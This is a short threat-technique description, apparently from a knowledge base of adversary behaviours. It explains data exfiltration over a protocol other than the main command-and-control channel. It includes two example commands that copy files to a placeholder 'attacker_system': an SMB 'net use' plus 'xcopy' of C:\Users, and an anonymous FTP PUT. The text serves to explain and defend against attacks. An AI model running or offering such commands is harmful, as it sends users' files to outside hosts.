Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.
Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol.
SMB command-line example:
<code>net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users
* \\\attacker_system\share_folder\</code>
Anonymous FTP command-line exampleCitation: Palo Alto OilRig Oct 2016)
<code>echo PUT C:\Path\to\file.txt | ftp -A attacker_system</code>